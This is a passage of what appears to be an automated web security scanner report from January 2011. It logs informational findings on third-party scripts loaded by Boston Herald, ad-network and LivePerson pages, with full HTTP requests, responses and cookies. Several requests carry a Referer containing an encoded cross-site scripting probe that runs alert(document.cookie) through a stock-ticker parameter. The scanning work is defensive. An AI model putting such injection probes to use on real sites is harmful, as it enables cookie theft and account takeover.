document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.102. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2694
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/626722831/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=626722831?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.103. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2694
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/279790573/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=279790573?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.104. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; HumanClickCHATKEY=3761611791040242971; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:06:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Content-Type: text/html
Last-Modified: Fri, 28 Jan 2011 14:06:44 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 43173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>

...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//liveperson-partners.s3.amazonaws.com/shared/js/mbox.js"></script>
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<!-- Business.com Conversion Tracking Code for "Business.com Conversion Tracking" -->
<script language="JavaScript" src="https://roi.business.com/crm/js/conversion.js"></script>
...[SNIP]...

18.105. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1861
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle"></script>
...[SNIP]...

18.106. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg HTTP/1.1
Host: bh.heraldinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:30 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1381
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/@!"></script>
...[SNIP]...

18.107. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:11 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1842
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top"></script>
...[SNIP]...

18.108. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1860
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom"></script>
...[SNIP]...

18.109. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1848
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top"></script>
...[SNIP]...

18.110. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1867
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle"></script>
...[SNIP]...

18.111. http://boston30.autochooser.com/results.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston30.autochooser.com
Path:   /results.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:20:30 GMT
Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/
Cache-control: private
Content-Length: 74164


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...
<link rel=stylesheet type="text/css" href="http://www.carfind.com/navigation/style.css">


<script src="http://www.bostonherald.com/navigation/hiasysMJX.js" LANGUAGE="JavaScript1.1" TYPE="text/javascript"></script>
...[SNIP]...
</style>
<script src="http://www.homefind.com/include/bgNavEng2.js" language="JavaScript1.1" type="text/javascript" ></script>
...[SNIP]...
</table>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.112. http://bostonherald.com/blogs/entertainment/the_assistant/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/entertainment/the_assistant/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/entertainment/the_assistant/?p=3065 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.113. http://bostonherald.com/blogs/lifestyle/fork_lift/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/lifestyle/fork_lift/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/lifestyle/fork_lift/?p=3679 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.114. http://bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.115. http://bostonherald.com/news/document.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/document.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/document.bg?f=misc/100216housing.pdf&h=Massachusetts%20Housing%20Partnership&k=bh HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.116. http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.117. http://bostonherald.com/news/regional/view/20110128copsgrannyattacksrobber/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20110128copsgrannyattacksrobber/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110128copsgrannyattacksrobber/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
